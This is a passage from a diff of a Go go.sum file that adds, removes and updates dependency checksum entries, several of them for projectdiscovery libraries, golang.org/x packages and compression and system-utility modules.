h1:EQUSKgW/YaOxmXpAwGiowFDO4i2Rmtk5+9dFyeiymAg= +github.com/itchyny/timefmt-go v0.1.3 h1:7M3LGVDsqcd0VZH2U+x393obrzZisp7C0uEe921iRkU= +github.com/itchyny/timefmt-go v0.1.3/go.mod h1:0osSSCQSASBJMsIZnhAaF1C2fCBTJZXrnj37mG8/c+A= github.com/jasonlvhit/gocron v0.0.1 h1:qTt5qF3b3srDjeOIR4Le1LfeyvoYzJlYpqvG7tJX5YU= github.com/jasonlvhit/gocron v0.0.1/go.mod h1:k9a3TV8VcU73XZxfVHCHWMWF9SOqgoku0/QlY2yvlA4= +github.com/jmespath/go-jmespath v0.0.0-20180206201540-c2b33e8439af/go.mod h1:Nht3zPeWKUH0NzdCt2Blrr5ys8VGpn0CEB0cQHVjt7k= +github.com/jpillora/backoff v0.0.0-20180909062703-3050d21c67d7/go.mod h1:2iMrUgbbvHEiQClaW2NsSzMyGHqN+rDFqY705q49KG0= github.com/json-iterator/go v1.1.10 h1:Kz6Cvnvv2wGdaG/V8yMvfkmNiXq9Ya2KUv4rouJJr68= github.com/json-iterator/go v1.1.10/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4= github.com/jstemmer/go-junit-report v0.0.0-20190106144839-af01ea7f8024/go.mod h1:6v2b51hI/fHJwM22ozAgKL4VKDeJcHhJFhtBdhmNjmU= @@ -178,7 +213,15 @@ github.com/karlseguin/expect v1.0.2-0.20190806010014-778a5f0c6003/go.mod h1:zNBx github.com/karrick/godirwalk v1.16.1 h1:DynhcF+bztK8gooS0+NDJFrdNZjJ3gzVzC545UNA9iw= github.com/karrick/godirwalk v1.16.1/go.mod h1:j4mkqPuvaLI8mp1DroR3P6ad7cyYd4c1qeJ3RV7ULlk= github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= +github.com/klauspost/compress v1.4.1 h1:8VMb5+0wMgdBykOV96DwNwKFQ+WTI4pzYURP99CcB9E= +github.com/klauspost/compress v1.4.1/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0guNDohfE1A= +github.com/klauspost/cpuid v1.2.0 h1:NMpwD2G9JSFOE1/TJjGSo5zG7Yb2bTe7eq1jH+irmeE= +github.com/klauspost/cpuid v1.2.0/go.mod h1:Pj4uuM528wm8OyEC2QMXAi2YiTZ96dNQPGgoMS4s3ek= +github.com/klauspost/pgzip v1.2.5 h1:qnWYvvKqedOF2ulHpMG72XQol4ILEJ8k2wwRl/Km8oE= +github.com/klauspost/pgzip v1.2.5/go.mod h1:Ch1tH69qFZu15pkjo5kYi6mth2Zzwzt50oCQKQE9RUs= +github.com/kr/logfmt v0.0.0-20140226030751-b84e30acd515/go.mod h1:+0opPa2QZZtGFBFZlji/RkVcI2GknAs/DXo4wKdlNEc= github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo= +github.com/kr/pretty v0.2.0/go.mod h1:ipq/a2n7PKx3OHsz4KJII5eveXtPO4qwEXGdVfWzfnI= github.com/kr/pretty v0.2.1 h1:Fmg33tUaq4/8ym9TJN1x7sLJnHVwhP33CNkpYV/7rwI= github.com/kr/pretty v0.2.1/go.mod h1:ipq/a2n7PKx3OHsz4KJII5eveXtPO4qwEXGdVfWzfnI= github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= @@ -188,17 +231,22 @@ github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE= github.com/logrusorgru/aurora v0.0.0-20200102142835-e9ef32dff381/go.mod h1:7rIyQOR62GCctdiQpZ/zOJlFyk6y+94wXzv6RNZgaR4= github.com/logrusorgru/aurora v2.0.3+incompatible h1:tOpm7WcpBTn4fjmVfgpQq0EfczGlG91VSDkswnjF5A8= github.com/logrusorgru/aurora v2.0.3+incompatible/go.mod h1:7rIyQOR62GCctdiQpZ/zOJlFyk6y+94wXzv6RNZgaR4= +github.com/mattn/go-colorable v0.1.1/go.mod h1:FuOcm+DKB9mbwrcAfNl7/TZVBZ6rcnceauSikq3lYCQ= +github.com/mattn/go-colorable v0.1.2/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE= +github.com/mattn/go-isatty v0.0.5/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= +github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= +github.com/mattn/go-isatty v0.0.13 h1:qdl+GuBjcsKKDco5BsxPJlId98mSWNKqYA+Co0SC1yA= +github.com/mattn/go-isatty v0.0.13/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU= github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI= github.com/mattn/go-runewidth v0.0.10 h1:CoZ3S2P7pvtP45xOtBw+/mDL2z0RKI576gSkzRRpdGg= github.com/mattn/go-runewidth v0.0.10/go.mod h1:RAqKPSqVFrSLVXbA8x7dzmKdmGzieGRCM46jaSJTDAk= +github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b/go.mod h1:01TrycV0kFyexm33Z7vhZRXopbI8J3TDReVlkTgMUxE= github.com/miekg/dns v1.1.29/go.mod h1:KNUDUusw/aVsxyTYZM1oqvCicbwhgbNgztCETuNZ7xM= github.com/miekg/dns v1.1.35/go.mod h1:KNUDUusw/aVsxyTYZM1oqvCicbwhgbNgztCETuNZ7xM= github.com/miekg/dns v1.1.38/go.mod h1:KNUDUusw/aVsxyTYZM1oqvCicbwhgbNgztCETuNZ7xM= github.com/miekg/dns v1.1.41 h1:WMszZWJG0XmzbK9FEmzH2TVcqYzFesusSIB41b8KHxY= github.com/miekg/dns v1.1.41/go.mod h1:p6aan82bvRIyn+zDIv9xYNUpwa73JcSh9BKwknJysuI= github.com/mitchellh/go-homedir v1.1.0/go.mod h1:SfyaCUpYCn1Vlf4IUYiD9fPX4A5wJrkLzIz1N1q0pr0= -github.com/mitchellh/go-ps v1.0.0 h1:i6ampVEEF4wQFF+bkYfwYgY+F/uYJDktmvLPf7qIgjc= -github.com/mitchellh/go-ps v1.0.0/go.mod h1:J4lOc8z8yJs6vUwklHw2XEIiT4z4C40KtWVN3nvg8Pg= github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd h1:TRLaZ9cD/w8PVh93nsPXa1VrQ6jlwL5oN8l14QlcNfg= github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= @@ -213,39 +261,44 @@ github.com/onsi/ginkgo v1.7.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+W github.com/onsi/ginkgo v1.10.1 h1:q/mM8GF/n0shIN8SaAZ0V+jnLPzen6WIVZdiwrRlMlo= github.com/onsi/ginkgo v1.10.1/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE= github.com/onsi/gomega v1.4.3/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1CpauHY= +github.com/onsi/gomega v1.5.0/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1CpauHY= github.com/onsi/gomega v1.7.0 h1:XPnZz8VVBHjVsy1vzJmRwIcSwiUO+JFfrv/xGiigmME= github.com/onsi/gomega v1.7.0/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1CpauHY= +github.com/owenrumney/go-sarif v1.0.4 h1:0LFC5eHP6amc/9ajM1jDiE52UfXFcl/oozay+X3KgV4= +github.com/owenrumney/go-sarif v1.0.4/go.mod h1:DXUGbHwQcCMvqcvZbxh8l/7diHsJVztOKZgmPt88RNI= github.com/pkg/errors v0.8.0/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= +github.com/pkg/errors v0.8.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4= github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/projectdiscovery/clistats v0.0.8 h1:tjmWb15mqsPf/yrQXVHLe2ThZX/5+mgKSfZBKWWLh20= github.com/projectdiscovery/clistats v0.0.8/go.mod h1:lV6jUHAv2bYWqrQstqW8iVIydKJhWlVaLl3Xo9ioVGg= -github.com/projectdiscovery/collaborator v0.0.2 h1:BSiMlWM3NvuKbpedn6fIjjEo5b7q5zmiJ6tI7+6mB3s= -github.com/projectdiscovery/collaborator v0.0.2/go.mod h1:J1z0fC7Svutz3LJqoRyTHA3F0Suh4livmkYv8MnKw20= github.com/projectdiscovery/fastdialer v0.0.9 h1:B06bwNwb9IpOwyb8L/ClwLBAmyRtRhsoX9lxUo0c6Sk= github.com/projectdiscovery/fastdialer v0.0.9/go.mod h1:zczVWqNjiTIWk/1IrpFR/kU2nKKHoH9rHBe68/OmpoU= -github.com/projectdiscovery/goflags v0.0.4 h1:fWKLMAr3KmPlZxE1b54pfei+vGIUJn9q6aM7woZIbCY= -github.com/projectdiscovery/goflags v0.0.4/go.mod h1:Ae1mJ5MIIqjys0lFe3GiMZ10Z8VLaxkYJ1ySA4Zv8HA= +github.com/projectdiscovery/goflags v0.0.6 h1:4ErduTfSC55cRR3TmUg+TQirBlCuBdBadrluAsy1pew= +github.com/projectdiscovery/goflags v0.0.6/go.mod h1:Ae1mJ5MIIqjys0lFe3GiMZ10Z8VLaxkYJ1ySA4Zv8HA= github.com/projectdiscovery/gologger v1.1.3/go.mod h1:jdXflz3TLB8bcVNzb0v26TztI9KPz8Lr4BVdUhNUs6E= github.com/projectdiscovery/gologger v1.1.4 h1:qWxGUq7ukHWT849uGPkagPKF3yBPYAsTtMKunQ8O2VI= github.com/projectdiscovery/gologger v1.1.4/go.mod h1:Bhb6Bdx2PV1nMaFLoXNBmHIU85iROS9y1tBuv7T5pMY= github.com/projectdiscovery/hmap v0.0.1 h1:VAONbJw5jP+syI5smhsfkrq9XPGn4aiYy5pR6KR1wog= github.com/projectdiscovery/hmap v0.0.1/go.mod h1:VDEfgzkKQdq7iGTKz8Ooul0NuYHQ8qiDs6r8bPD1Sb0= -github.com/projectdiscovery/interactsh v0.0.2 h1:v2gsHQbuMKu0OxK+PEduKR7lRQFsdNSZjxmI7iRa46g= -github.com/projectdiscovery/interactsh v0.0.2/go.mod h1:dWnKO14d2FLP3kLhI9DecEsiAC/aZiJoUBGFjGhDskY= +github.com/projectdiscovery/interactsh v0.0.3 h1:PUkWk+NzSyd5glMqfORmuqizhsd7c3WdTYBOto/MQIU= +github.com/projectdiscovery/interactsh v0.0.3/go.mod h1:dWnKO14d2FLP3kLhI9DecEsiAC/aZiJoUBGFjGhDskY= github.com/projectdiscovery/mapsutil v0.0.1 h1:hXIQUPvU+5HtPzzyaLvsPg4R/39N77CCAL0ezYhFdgw= github.com/projectdiscovery/mapsutil v0.0.1/go.mod h1:Q49P7sQzz9m+dWgdx/ryNwOfsClt8ZmHhF4WdXTheyE= -github.com/projectdiscovery/rawhttp v0.0.6 h1:HbgPB1eKXQVV5F9sq0Uxflm95spWFyZYD8dgFpeOC9M= -github.com/projectdiscovery/rawhttp v0.0.6/go.mod h1:PQERZAhAv7yxI/hR6hdDPgK1WTU56l204BweXrBec+0= +github.com/projectdiscovery/rawhttp v0.0.7 h1:5m4peVgjbl7gqDcRYMTVEuX+Xs/nh76ohTkkvufucLg= +github.com/projectdiscovery/rawhttp v0.0.7/go.mod h1:PQERZAhAv7yxI/hR6hdDPgK1WTU56l204BweXrBec+0= github.com/projectdiscovery/retryabledns v1.0.8-0.20210226233812-ee2ecc9839d9/go.mod h1:4sMC8HZyF01HXukRleSQYwz4870bwgb4+hTSXTMrkf4= github.com/projectdiscovery/retryabledns v1.0.10 h1:xJZ2aKoqrNg/OZEw1+4+QIOH40V/WkZDYY1ZZc+uphE= github.com/projectdiscovery/retryabledns v1.0.10/go.mod h1:4sMC8HZyF01HXukRleSQYwz4870bwgb4+hTSXTMrkf4= -github.com/projectdiscovery/retryablehttp-go v1.0.1 h1:V7wUvsZNq1Rcz7+IlcyoyQlNwshuwptuBVYWw9lx8RE= github.com/projectdiscovery/retryablehttp-go v1.0.1/go.mod h1:SrN6iLZilNG1X4neq1D+SBxoqfAF4nyzvmevkTkWsek= +github.com/projectdiscovery/retryablehttp-go v1.0.2-0.20210524224054-9fbe1f2b0727 h1:CJHP3CLCc/eqdXQEvZy8KiiqtAk9kEsd1URtPyPAQ1s= +github.com/projectdiscovery/retryablehttp-go v1.0.2-0.20210524224054-9fbe1f2b0727/go.mod h1:dx//aY9V247qHdsRf0vdWHTBZuBQ2vm6Dq5dagxrDYI= github.com/projectdiscovery/starlight v0.0.0-20210322151037-9b9e2da4e8b7 h1:FxVoSHBcadJDy+Wd87fsmObqdtXYfv4+BscJyPLPFY0= github.com/projectdiscovery/starlight v0.0.0-20210322151037-9b9e2da4e8b7/go.mod h1:pkTOha1+gO0swnt38r2sg3+8D2ANPrA+wID3cjsY39s= +github.com/projectdiscovery/stringsutil v0.0.0-20210617141317-00728870f68d h1:nlOAex7twmrEqD5i6WLnugF9uO3DQ6jDEKN9gevrTAk= +github.com/projectdiscovery/stringsutil v0.0.0-20210617141317-00728870f68d/go.mod h1:TVSdZC0rRQeMIbsNSiGPhbmhyRtxqqtAGA9JiiNp2r4= github.com/prologic/smtpd v0.0.0-20210126001904-0893ad18168e h1:ZT3wZ92sp/EHEE/HcFCWCsYS3ROLjHb6EqSX8qYrgXw= github.com/prologic/smtpd v0.0.0-20210126001904-0893ad18168e/go.mod h1:GkLsdH1RZj6RDKeI9A05NGZYmEZQ/PbQcZPnZoSZuYI= github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= @@ -254,11 +307,18 @@ github.com/remeh/sizedwaitgroup v1.0.0/go.mod h1:3j2R4OIe/SeS6YDhICBy22RWjJC5eNC github.com/rivo/uniseg v0.1.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= github.com/rivo/uniseg v0.2.0 h1:S1pD9weZBuJdFmowNwbpi7BJ8TNftyUImj/0WQi72jY= github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= +github.com/rogpeppe/fastuuid v1.1.0/go.mod h1:jVj6XXZzXRy/MSR5jhDC/2q6DgLz+nrA6LYCDYWNEvQ= github.com/rogpeppe/go-internal v1.3.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4= github.com/rs/xid v1.2.1 h1:mhH9Nq+C1fY2l1XIpgxIiUOfNpRBYH1kKcr+qfKgjRc= github.com/rs/xid v1.2.1/go.mod h1:+uKXf+4Djp6Md1KODXJxgGQPKngRmWyn10oCKFzNHOQ= github.com/segmentio/ksuid v1.0.3 h1:FoResxvleQwYiPAVKe1tMUlEirodZqlqglIuFsdDntY= github.com/segmentio/ksuid v1.0.3/go.mod h1:/XUiZBD3kVx5SmUOl55voK5yeAbBNNIed+2O73XgrPE= +github.com/sergi/go-diff v1.0.0/go.mod h1:0CfEIISq7TuYL3j771MWULgwwjU+GofnZX9QAmXWZgo= +github.com/shirou/gopsutil/v3 v3.21.5 h1:YUBf0w/KPLk7w1803AYBnH7BmA+1Z/Q5MEZxpREUaB4= +github.com/shirou/gopsutil/v3 v3.21.5/go.mod h1:ghfMypLDrFSWN2c9cDYFLHyynQ+QUht0cv/18ZqVczw= +github.com/smartystreets/assertions v1.0.0/go.mod h1:kHHU4qYBaI3q23Pp3VPrmWhuIUrLW/7eUrw0BU5VaoM= +github.com/smartystreets/go-aws-auth v0.0.0-20180515143844-0c1422d1fdb9/go.mod h1:SnhjPscd9TpLiy1LpzGSKh3bXCfxxXuqd9xmQJy3slM= +github.com/smartystreets/gunit v1.0.0/go.mod h1:qwPWnhz6pn0NnRBP++URONOVyNkPyr4SauJk4cUOwJs= github.com/spaolacci/murmur3 v1.1.0 h1:7c1g84S4BPRrfL5Xrdp6fOJ206sU9y293DDHaoy0bLI= github.com/spaolacci/murmur3 v1.1.0/go.mod h1:JwIasOWyU6f++ZhiEuf87xNszmSA2myDM2Kzu9HwQUA= github.com/spf13/cast v1.3.1 h1:nFm6S0SMdyzrzcmThSipiEubIDy8WEXKNZ0UOgiRpng= @@ -273,13 +333,31 @@ github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5Cc github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/syndtr/goleveldb v1.0.0 h1:fBdIW9lB4Iz0n9khmH8w27SJ3QEJ7+IgjPEwGSZiFdE= github.com/syndtr/goleveldb v1.0.0/go.mod h1:ZVVdQEZoIme9iO1Ch2Jdy24qqXrMMOU6lpPAyBWyWuQ= +github.com/tj/assert v0.0.0-20171129193455-018094318fb0/go.mod h1:mZ9/Rh9oLWpLLDRpvE+3b7gP/C2YyLFYxNmcLnPTMe0= +github.com/tj/assert v0.0.3 h1:Df/BlaZ20mq6kuai7f5z2TvPFiwC3xaWJSDQNiIS3Rk= +github.com/tj/assert v0.0.3/go.mod h1:Ne6X72Q+TB1AteidzQncjw9PabbMp4PBMZ1k+vd1Pvk= +github.com/tj/go-buffer v1.1.0/go.mod h1:iyiJpfFcR2B9sXu7KvjbT9fpM4mOelRSDTbntVj52Uc= +github.com/tj/go-elastic v0.0.0-20171221160941-36157cbbebc2/go.mod h1:WjeM0Oo1eNAjXGDx2yma7uG2XoyRZTq1uv3M/o7imD0= +github.com/tj/go-kinesis v0.0.0-20171128231115-08b17f58cb1b/go.mod h1:/yhzCV0xPfx6jb1bBgRFjl5lytqVqZXEaeqWP8lTEao= +github.com/tj/go-spin v1.1.0/go.mod h1:Mg1mzmePZm4dva8Qz60H2lHwmJ2loum4VIrLgVnKwh4= +github.com/tj/go-update v2.2.5-0.20200519121640-62b4b798fd68+incompatible h1:guTq1YxwB8XSILkI9q4IrOmrCOS6Hc1L3hmOhi4Swcs= +github.com/tj/go-update v2.2.5-0.20200519121640-62b4b798fd68+incompatible/go.mod h1:waFwwyiAhGey2e+dNoYQ/iLhIcFqhCW7zL/+vDU1WLo= +github.com/tklauser/go-sysconf v0.3.4 h1:HT8SVixZd3IzLdfs/xlpq0jeSfTX57g1v6wB1EuzV7M= +github.com/tklauser/go-sysconf v0.3.4/go.mod h1:Cl2c8ZRWfHD5IrfHo9VN+FX9kCFjIOyVklgXycLB6ek= +github.com/tklauser/numcpus v0.2.1 h1:ct88eFm+Q7m2ZfXJdan1xYoXKlmwsfP+k88q05KvlZc= +github.com/tklauser/numcpus v0.2.1/go.mod h1:9aU+wOc6WjUIZEwWMP62PL/41d65P+iks1gBkr4QyP8= github.com/trivago/tgo v1.0.1/go.mod h1:w4dpD+3tzNIIiIfkWWa85w5/B77tlvdZckQ+6PkFnhc= github.com/trivago/tgo v1.0.7 h1:uaWH/XIy9aWYWpjm2CU3RpcqZXmX2ysQ9/Go+d9gyrM= github.com/trivago/tgo v1.0.7/go.mod h1:w4dpD+3tzNIIiIfkWWa85w5/B77tlvdZckQ+6PkFnhc= +github.com/ulikunitz/xz v0.5.6/go.mod h1:2bypXElzHzzJZwzH67Y6wb67pO62Rzfn7BSiF4ABRW8= +github.com/ulikunitz/xz v0.5.10 h1:t92gobL9l3HE202wg3rlk19F6X+JOxl9BBrCCMYEYd8= +github.com/ulikunitz/xz v0.5.10/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14= github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw= github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc= github.com/valyala/fasttemplate v1.2.1 h1:TVEnxayobAdVkhQfrfes2IzOB6o+z4roRkPF52WA1u4= github.com/valyala/fasttemplate v1.2.1/go.mod h1:KHLXt3tVN2HBp8eijSv/kGJopbvo7S+qRAEEKiv+SiQ= +github.com/vmihailenco/msgpack/v4 v4.3.12/go.mod h1:gborTTJjAo/GWTqqRjrLCn9pgNN+NXzzngzBKDPIqw4= +github.com/vmihailenco/tagparser v0.1.1/go.mod h1:OeAg3pn3UbLjkWt+rN9oFYB6u/cQgqMEUPoW2WPyhdI= github.com/wsxiaoys/terminal v0.0.0-20160513160801-0940f3fc43a0 h1:3UeQBvD0TFrlVjOeLOBz+CPAI8dnbqNSVwUwRrkp7vQ= github.com/wsxiaoys/terminal v0.0.0-20160513160801-0940f3fc43a0/go.mod h1:IXCdmsXIht47RaVFLEdVnh1t+pgYtTAhQGj73kz+2DM= github.com/xanzy/go-gitlab v0.47.0 h1:nC35CNaGr9skHkJq1HMYZ58R7gZsy7SO37SkA2RIHbM= @@ -297,6 +375,8 @@ github.com/ysmood/leakless v0.6.14/go.mod h1:R8iAXPRaG97QJwqxs74RdwzcRHT1SWCGTNq github.com/yuin/goldmark v1.1.25/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.1.32/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= +github.com/zclconf/go-cty v1.8.2 h1:u+xZfBKgpycDnTNjPhGiTEYZS5qS/Sb5MqSfm7vzcjg= +github.com/zclconf/go-cty v1.8.2/go.mod h1:vVKLxnk3puL4qRAv72AO+W99LUD4da90g3uUAzyuvAk= go.opencensus.io v0.21.0/go.mod h1:mSImk1erAIZhrmZN+AvHh14ztQfjbGwt4TtuofqLduU= go.opencensus.io v0.22.0/go.mod h1:+kGneAE2xo2IficOXnaByMWTGM9T73dGwxeWcUqIpI8= go.opencensus.io v0.22.2/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw= @@ -320,8 +400,6 @@ golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPh golang.org/x/crypto v0.0.0-20201002170205-7f63de1d35b0/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20201112155050-0c6587e931a9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20201221181555-eec23a3978ad/go.mod h1:jdWPYTVW3xRLrWPugEBEK3UY2ZEsg3UU495nc5E+M+I= -golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2 h1:It14KIkyBFYkHkwZ7k45minvA9aorojkyjGk9KJ5B/w= -golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20190306152737-a1d7652674e8/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20190510132918-efd6b22b2522/go.mod h1:ZjyILWgesfNpC6sMxTJOJm9Kp84zZh5NQWvqDGG3Qr8= @@ -383,8 +461,8 @@ golang.org/x/net v0.0.0-20200707034311-ab3426394381/go.mod h1:/O7V0waA8r7cgGh81R golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= golang.org/x/net v0.0.0-20210119194325-5f4716e94777/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= -golang.org/x/net v0.0.0-20210316092652-d523dce5a7f4 h1:b0LrWgu8+q7z4J+0Y3Umo5q1dL7NXBkKBWkaVkAq17E= -golang.org/x/net v0.0.0-20210316092652-d523dce5a7f4/go.mod h1:RBQZq4jEuRlivfhVLdyRGr576XBO4/greRjx4P4O3yc= +golang.org/x/net v0.0.0-20210521195947-fe42d452be8f h1:Si4U+UcgJzya9kpiEUJKQvjr512OLli+gL4poHrz93U= +golang.org/x/net v0.0.0-20210521195947-fe42d452be8f/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.0.0-20181106182150-f42d05182288/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= @@ -406,6 +484,7 @@ golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJ golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20180909124046-d0be0721c37e/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190312061237-fead79001313/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20190502145724-3ef323f4f1fd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= @@ -419,6 +498,7 @@ golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7w golang.org/x/sys v0.0.0-20191204072324-ce4227a45e2e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20191228213918-04cbcbbfeed8/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200113162924-86b910548bc1/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200122134326-e047566fdf82/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200202164722-d101bd2416d5/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200212091648-12a6c2dcc1e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= @@ -436,10 +516,11 @@ golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7w golang.org/x/sys v0.0.0-20201113233024-12cec1faf1ba/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210217105451-b926d437f341/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210303074136-134d130e1a04/go.mod 